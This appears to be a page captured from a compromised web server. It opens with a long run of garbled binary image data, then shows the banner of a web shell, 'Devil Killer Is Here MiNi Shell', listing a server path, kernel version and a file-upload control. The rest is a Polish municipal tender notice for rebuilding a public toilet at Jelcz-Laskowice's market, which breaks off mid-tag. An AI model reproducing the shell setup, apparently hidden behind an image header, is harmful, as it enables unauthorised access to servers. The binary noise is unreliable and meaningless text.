JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230425/0019150301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa targowiska miejskiego - budowa kontenerowej toalety publicznej na terenie targowiska miejskiego w Jelczu-Laskowicach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Jelcz-Laskowice</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Małgorzata Łubkowska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931934880</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Witosa, 24</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jelcz-Laskowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um.zamowienia2@jelcz-laskowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.um.jelcz-laskowice.finn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa targowiska miejskiego - budowa kontenerowej toalety publicznej na terenie targowiska miejskiego w Jelczu-Laskowicach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-098f6076-e355-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00191503</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00056555/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.23 Przebudowa targowiska miejskiego - budowa kontenerowej toalety publicznej na terenie targowiska miejskiego w Jelczu-Laskowicach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/jelcz_laskowice <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/jelcz_laskowice</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim w formie<br/>elektroniczn j zapośrednictwem platformazakupowa.pl pod<br/>adresem https://platformazakupowa.pl/pn/jelcz_laskowice3. W celu skrócenia czasu udzielenia<br/>odpowiedzi napytania preferuje się, aby komunikacjamiędzyzamawiającym a Wykonawcami, w tym<br/>wszelkie oświadczenia, wnioski, zawiadomienia orazinformacje, przekazywane były za<br/>pośrednictwemplatformazakupowa.pl i formularza „Wyślijwiadomośćdo zamawiającego”. Za datę<br/>przekazania(wpływu) oświadczeń, wniosków, zawiadomieńorazinformacji przyjmuje się datę ich<br/>przesłania za pośrednictwem platformazakupowa.pl poprzezkliknięcieprzycisku „Wyślij wiadomość<br/>dozamawiającego” po których pojawi się komunikat, żewiadomośćzostała wysłana do<br/>zamawiającego. Zamawiający dopuszcza, opcjonalnie, komunikację zapośrednictwem poczty<br/>elektronicznej. Adrespoczty elektronicznej osoby uprawnionej do kontaktuzWykonawcami:<br/>um.zamowienia@jelczlaskowice.pl4. Zamawiający będzie przekazywał wykonawcominformacje za<br/>pośrednictwemplatformazakupowa.pl. Informacje dotyczące odpowiedzi napytania,zmiany specyfikacji,<br/>zmianyterminu składania i otwarcia ofert Zamawiający będziezamieszczał na platformie w<br/>sekcji“Komunikaty”. Korespondencja, której zgodnie z obowiązującymiprzepisami adresatem jest<br/>konkretny Wykonawca, będzie przekazywana za pośrednictwemplatformazakupowa.pldo<br/>konkretnegowykonawcy.5. Wykonawca jako podmiot profesjonalny maobowiązek sprawdzania<br/>komunikatów iwiadomości bezpośrednio na platformazakupowa.plprzesłanych przez<br/>zamawiającego,gdyż systempowiadomień może ulec awarii lub powiadomieniemoże trafić do folderu<br/>SPAM.6. Zamawiający,zgodnie z § 11 ust. 2 ROZPORZĄDZENIE PREZESARADY MINISTRÓW z<br/>dnia 30grudnia 2020 r. wsprawie sposobu sporządzania i przekazywaniainformacji oraz<br/>wymagańtechnicznych dla dokumentówelektronicznych oraz środków komunikacjielektronicznej<br/>wpostępowaniu o udzielenie zamówieniapublicznego lub<br/>konkursiezamieszczawymaganiadotyczącespecyfikacji połączenia, formatuprzesyłanych danych oraz<br/>szyfrowania i oznaczania czasuprzekazania i odbioru danych zapośrednictwem platformazakupowa.pl, tj.:a) stałydostęp do<br/>sieciInternet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,b) komputer klasy PC lub<br/>MAC onastępującej konfiguracji:pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jegonowsza<br/>wersja,jeden z systemówoperacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich<br/>nowszewersje,c)zainstalowana dowolnaprzeglądarka internetowa, w przypadku Internet Explorer<br/>minimalniewersja 100.,d) włączona obsługaJavaScript,e) zainstalowany program Adobe Acrobat<br/>Reader lubinnyobsługujący format plików .pdf,f)Platformazakupowa.pl działa według standardu<br/>przyjętegowkomunikacji sieciowej - kodowanie UTF8,g)Oznaczenie czasu odbioru danych<br/>przezplatformęzakupową stanowi datę oraz dokładny czas(hh:mm:ss) generowany wg. czasu<br/>lokalnegoserwerasynchronizowanego z zegarem Głównego UrzęduMiar.7. Wykonawca, przystępując<br/>doniniejszegopostępowania o udzielenie zamówienia publicznego:h)akceptuje warunki korzystania<br/>zplatformazakupowa.pl określone w Regulaminie zamieszczonym nastronie internetowej pod linkiem<br/>wzakładce „Regulamin&#34; oraz uznaje go za wiążący,i) zapoznał istosuje się do<br/>Instrukcjiskładaniaofert/wniosków dostępnej pod linkiem. 8. Zamawiający informuje, żeinstrukcje<br/>korzystania zplatformazakupowa.pl dotyczące w szczególności logowania, składaniawniosków o<br/>wyjaśnienie treściSWZ, składania ofert oraz innych czynności podejmowanych wniniejszym<br/>postępowaniu przyużyciuplatformazakupowa.pl znajdują się w zakładce „Instrukcje dlaWykonawców&#34;<br/>na stronieinternetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i<br/>2rozporządzeniaParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawieochrony osóbfizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnegoprzepływu takichdanych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U.UE L119 z dnia4<br/>maja 2016r., str. 1; zwanym dalej „RODO”) informujemy, że:1) administratoremPani/Pana danychosobowych jestGmina Jelcz-<br/>Laskowice ul.Witosa 24 55-220 Jelcz-<br/>Laskowice.2)administratorwyznaczył InspektoraDanych Osobowych, z którym można się kontaktować<br/>pod adreseme-mail: -iod@jelcz-laskowice.pl3)Pani/Pana dane osobowe przetwarzane będą na<br/>podstawie art. 6 ust.1 lit. cRODO w celu związanymz przedmiotowym postępowaniem o udzielenie<br/>zamówieniapublicznego,prowadzonym w trybieprzetargu nieograniczonego.4) odbiorcami Pani/Pana<br/>danychosobowych będąosoby lub podmioty,którym udostępniona zostanie dokumentacja<br/>postępowania woparciu o art. 74ustawy PZP5)Pani/Pana dane osobowe będą przechowywane zgodnie<br/>z art. 78 ust. 1PZP przezokres 4 lat od dniazakończenia postępowania o udzielenie<br/>zamówienia, a jeżeli czas trwaniaumowyprzekracza 4 lata,okres przechowywania obejmuje cały czas<br/>trwania umowy;6) obowiązekpodaniaprzez Panią/Panadanych osobowych bezpośrednio Pani/Pana<br/>dotyczących jestwymogiemustawowym określonym wprzepisach ustawy PZP, związanym z udziałem w<br/>postępowaniu oudzieleniezamówieniapublicznego.7) w odniesieniu do Pani/Pana danych osobowych<br/>decyzje niebędąpodejmowane wsposób zautomatyzowany, stosownie do art. 22 RODO.8) posiada<br/>Pani/Pan:a)napodstawie art. 15RODO prawo dostępu do danych osobowych Pani/Pana dotyczących<br/>(wprzypadku,gdy skorzystanie ztego prawa wymagałoby po stronie administratora<br/>niewspółmierniedużego wysiłkumoże zostaćPani/Pan zobowiązana do wskazania dodatkowych<br/>informacji mających nacelusprecyzowanie żądania, w szczególności podania nazwy lub daty<br/>postępowania oudzieleniezamówienia publicznegolub konkursu albo sprecyzowanie nazwy lub daty<br/>zakończonegopostępowaniao udzieleniezamówienia);b) na podstawie art. 16 RODO prawo do<br/>sprostowaniaPani/Pana danychosobowych(skorzystanie z prawa do sprostowania nie może skutkować<br/>zmianąwyniku postępowania oudzieleniezamówienia publicznego ani zmianą postanowień umowy w<br/>zakresieniezgodnym z ustawąPZP oraznie może naruszać integralności protokołu oraz jego<br/>załączników);c) napodstawie art. 18RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danychosobowych zzastrzeżeniemokresu trwania postępowania o udzielenie zamówienia publicznego lubkonkursu<br/>orazprzypadków, októrych mowa w art. 18 ust. 2 RODO (prawo<br/>do ograniczeniaprzetwarzania nie mazastosowania wodniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub wcelu ochrony praw innej osoby fizycznej lub<br/>prawnej, lub z uwagi naważne względyinteresupublicznego Unii Europejskiej lub państwa<br/>członkowskiego);d) prawo downiesienia skargi doPrezesaUrzędu Ochrony Danych Osobowych, gdy<br/>uzna Pani/Pan, żeprzetwarzanie danychosobowychPani/Pana dotyczących narusza przepisy RODO;<br/>9) przysługujePani/Panu prawowniesienia skargi doorganu nadzorczego na niezgodne z RODO<br/>przetwarzaniePani/Pana danychosobowych przezadministratora. Organem właściwym dla<br/>przedmiotowej skargi jestUrząd OchronyDanychOsobowych, ul. Stawki 2, 00-193 Warszawa</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:a) w związku z art. 17 ust.<br/>3lit.b,d lub e RODO prawo do usunięcia danych osobowych;b) prawo do przenoszenia<br/>danychosobowych,októrym mowa w art. 20 RODO;c) na podstawie art. 21 RODO prawo<br/>sprzeciwu,wobecprzetwarzaniadanych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Panadanychosobowych jest art. 6 ust.1 lit. c RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZF.271.10.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest: Przebudowa targowiska miejskiego - budowa kontenerowej toalety publicznej na terenie targowiska miejskiego w Jelczu-Laskowicach w zakresie:<br/>1)	rozbiórki istniejącego budynku toalety publicznej,<br/>2)	budowy toalety publicznej.<br/>2.	Rozbiórka istniejącego budynku toalety publicznej obejmuje następujące prace demontażowe i wyburzenia:<br/>1)	demontaż urządzeń wyposażenia technologicznego budynku;<br/>2)	demontaż instalacji sanitarnych i elektrycznych budynku;<br/>3)	demontaż elementów zagospodarowania terenu w obrębie budynku wyburzanego - utwardzona nawierzchnia;<br/>4)	rozbiórka przegród budowlanych oraz fundamentów budynku objętego opracowaniem.<br/>3.	Budynek przeznaczony do demontażu jest jednokondygnacyjny, wykonany w technologii tradycyjnej, murowanej, dach płaski kryty papą. Zadaszenie o konstrukcji drewnianej nad elewacją południową, wschodnią i zachodnią kryte dachówką ceramiczną.<br/>4.	Powierzchnia zabudowy wynosi 45,70 m2.<br/>5.	Kubatura budynku wynosi 160 m3.<br/><br/>Uwaga ! <br/>Wywóz i utylizacja odpadów powstałych podczas prac rozbiórkowych należy do Wykonawcy.<br/><br/>6.	Budowa toalety publicznej.<br/>6.1Branża architektoniczna i konstrukcji obejmuje w zakresie robót budowlanych wykonanie budynku o konstrukcji stalowej: <br/>1) Zaprojektowany budynek o konstrukcji stalowej posiada trzy wejścia od strony południowej do toalet, a od strony wschodniej znajdują się wejścia do pomieszczenia administracyjnego oraz magazynu, z którego jest możliwość przejścia do pomieszczenia technicznego oraz jedno wejście od strony północnej do pomieszczenia technicznego. <br/>2) Wysokość pomieszczeń w świetle wynosi 2,50 m.<br/>3) Budynek przystosowany do maksymalnej liczby 100 użytkowników w ciągu dnia. <br/>4) Elewacja budynku wykończona okładziną z płyt włókno-cementowych w układzie pionowym (dwa rodzaje płyty o gładkiej fakturze oraz imitującej drewno z pionowym ryflowaniem). Płyty w kolorach odcieni szarości według części rysunkowej.<br/>5) Rodzaje pomieszczeń w budynku:<br/>a) WC męski;<br/>b) WC damski;<br/>c) WC dla osób z niepełnosprawnością;<br/>d) magazyn;<br/>e) pomieszczenie obsługi targowiska;<br/>f) pomieszczenie pomocnicze. <br/>6) Ogrzewanie pomieszczeń w budynku będzie realizowane poprzez zastosowanie mat grzewczych, których obsługa pozwala na płynną regulację temperatury w każdym z ogrzewanych pomieszczeń. Ciepła woda użytkowa będzie realizowana przez pompę ciepła. <br/>7) Kubatura budynku wynosi 134 m3. <br/>8) Zaprojektowany budynek ma konstrukcję ramową, w modułach w dwóch rozmiarach: 2,37 m x 4,00 m oraz 2,85 m x 4,00 m.<br/>Szczegółowa charakterystyka i parametry budynku toalety znajdują się w projekcie technicznym. <br/>6.2	Wykonanie wokół budynku toalety 75,30 m2 nawierzchni utwardzonej z bezfazowej kostki betonowej szarej grubości 6 cm, na podsypce cementowo-piaskowej, utwardzonej warstwie z kruszywa łamanego oraz zagęszczonej podsypce piaskowej. Nawierzchnia utwardzona ograniczona obrzeżami z krawężników betonowych. Szczegółowa charakterystyka nawierzchni znajduje się w projekcie technicznym.<br/>6.3	Rekultywacja trawnika - 87,14 m2. <br/>7.	Zakres branży instalacji sanitarnych obejmuje wykonanie:<br/>1) instalacji wodociągowej (wody zimnej, ciepłej, cyrkulacji);<br/>2) instalacji kanalizacji sanitarnej;<br/>3) instalacji ogrzewania;<br/>4) instalacji wentylacji mechanicznej.<br/>8.	Zakres branży instalacji elektrycznych obejmuje:<br/>1) przebudowę układu zasilania budynku oraz lokali usługowych i przebudowę sieci TAURON - zgodnie z warunkami technicznymi określonymi w projekcie wykonawczym przebudowy sieci elektrycznych TAURON Dystrybucja S.A.;<br/>2) zasilanie obiektu;<br/>3) tablice licznikowe;<br/>4) rozdzielnicę główną RG;<br/>5) trasy kablowe;<br/>6) instalację oświetlenia wnętrzowego, gniazd wtykowych oraz zasilania urządzeń stacjonarnych;<br/>7) instalację przywoławczą z toalety dla niepełnosprawnych;<br/>8) instalację uziemiającą i odgromową;<br/>9) instalację fotowoltaiczną. <br/>9.	Projekt wykonawczy przebudowy sieci elektrycznych TAURON Dystrybucja S.A.<br/>9.1	W związku z planowaną rozbiórką istniejącej toalety publicznej i budową nowego zespołu toalet, konieczna jest przebudowa istniejącego zestawu złączowo-pomiarowego wraz z wchodzącymi do niego kablami sieci rozdzielczej niskiego napięcia - zgodnie z Warunkami Technicznymi Usunięcia Kolizji Sieci Elektroenergetycznej.<br/>9.2	Przed przystąpieniem do prac Wykonawca zobowiązany jest do zapoznania się z całością dokumentacji projektowej oraz do dokonania wizji lokalnej w terenie. <br/>9.3	Zakres robót do wykonania przez Wykonawcę przebudowy sieci w celu usunięcia kolizji:<br/>1)	demontaż istniejącego zestawu złączowo-pomiarowego, montaż nowej szafki i zabudowa w miejscu pokazanym na rysunku E-T-1 nowego złącza kablowego ZK4.<br/>Kable będące elementami sieci TAURON, podłączone do istniejącego złącza kablowegoprzeznaczonego do likwidacji, należy wprowadzić do nowej szafki ZK4. Należy je przedłużyć stosując sztukówki z odcinków kabli. Połączenia należy wykonać za pomocą muf kablowych. Po wykonaniu przebudowy Wykonawca w porozumieniu z odbiorcami energii jest zobowiązany zgłosić fakt przebudowy i przeniesienia układu pomiarowego w Biurze Obsługi Klienta w celu aktualizacji umowy o dostawę energii.<br/>2)	Materiały z demontażu urządzeń, wskazane przez Wydział Eksploatacji OME3, należy przekazać do magazynu. Pozostałe materiały utylizuje Wykonawca. Protokoły z utylizacji materiałów należy przedłożyć do OME3 Oleśnica.<br/>3)	Usunięcie kolizji należy zrealizować w sposób umożliwiający realizację planowanych zmian w zagospodarowaniu terenu z zachowaniem dotychczasowych funkcji, relacji i parametrów prowadzenie działalności statutowej w sposób nie gorszy niż przed usunięciem kolizji.<br/>4)	Wykonawca jest zobowiązany przedłożyć harmonogram prac uwzględniający minimalizację czasu wyłączenia.<br/>5)	Wykonawca musi uzyskać zgodę i ponieść koszty wymaganego odpłatnego wyłączenia odpowiednich urządzeń energetycznych oraz ustalić nadzór służbenergetycznych. Na czas wykonywania przebudowy należy zapewnić ciągłość zasilania istniejącychobwodów, zasilanie tymczasowe lub agregaty prądotwórcze.<br/>6)	Wszelkie prace na istniejących urządzeniach energetycznych będących własnością TAURON Dystrybucja S.A. należy wykonywać z zachowaniem szczególnych środków ostrożności pod nadzorem służb energetycznych Regionu Dystrybucji w Oleśnicy, a następnie zgłosić celem dokonania odbioru robót zanikowych, a po zakończeniu realizacji całego zakresu prac zgłosić je do końcowego odbioru technicznego. <br/>7)	Przed zasypaniem linii kablowych należy dokonać ich odbioru przez służby techniczne energetyki oraz zinwentaryzować geodezyjnie. <br/>8)	Prace przy urządzeniach energetycznych muszą być wykonywane przez firmę działającą w branży elektrycznej, przez pracowników posiadających odpowiednie kwalifikacje, zgodnie z obowiązującymi normami i przepisami.<br/>9)	W przypadku występowania kabli elektroenergetycznych zabrania się prowadzenia robót ziemnych sprzętem mechanicznym w odległości mniejszej niż 2 m od kabla zlokalizowanego przekopem kontrolnym. Kable można odkopać tylko do strefy ochronnej tj. folii lub cegły - zabrania się odkrywania czynnych kabli energetycznych. <br/>10)	Po zakończeniu usunięcia kolizji sieci należy uaktualnić mapy geodezyjne z naniesieniem tychże do Państwowych Zasobów Geodezyjnych. <br/>11)	Do odbioru prac należy przedłożyć powykonawczą dokumentację. Dokumentacja geodezyjna powinna być wykonana zgodnie z wymaganiami TDSA w wersji papierowej i elektronicznej.<br/>9.4	Wykonawca jest zobowiązany do wykonania i dostarczenia Zamawiającemu, w terminie 10 dni roboczych przed planowanym odbiorem technicznym urządzeń wykonanych w ramach usunięcia kolizji obiektu - dokumentacji obejmującej dokumenty określone w Załączniku nr 2 do Wytycznych w sprawie odbiorów i sprawdzeń urządzeń elektroenergetycznych i sieci dystrybucyjnej w TAURON Dystrybucja S.A., który stanowi załącznik nr 5 do SWZ.<br/>Uwaga !<br/>Na terenie inwestycji zlokalizowanych jest 5 drzew, które należy zabezpieczyć na czas robót budowlanych oraz prowadzić wszelkie prace przy szczególnej staranności aby nie uszkodzić konarów oraz korzeni drzew.<br/>10.	Szczegółowy zakres robót znajduje się w załącznikach:<br/>1)	projekach technicznych;<br/>2)	opracowaniu pt. „Rozbiórka budynku toalety publicznej zlokalizowanej na terenie targowiska miejskiego w Jelczu-Laskowicach”;<br/>3)	przedmiarach:<br/>•	robót branży architektonicznej i konstrukcji, <br/>•	robót branży sanitarnej,<br/>•	robót branży elektrycznej<br/>4)	projekcie wykonawczym przebudowy sieci elektrycznych TAURON Dystrybucja S.A.<br/>stanowiących opis przedmiotu zamówienia – załącznik nr 12 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45262420-1 - Wznoszenie konstrukcji obiektów</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 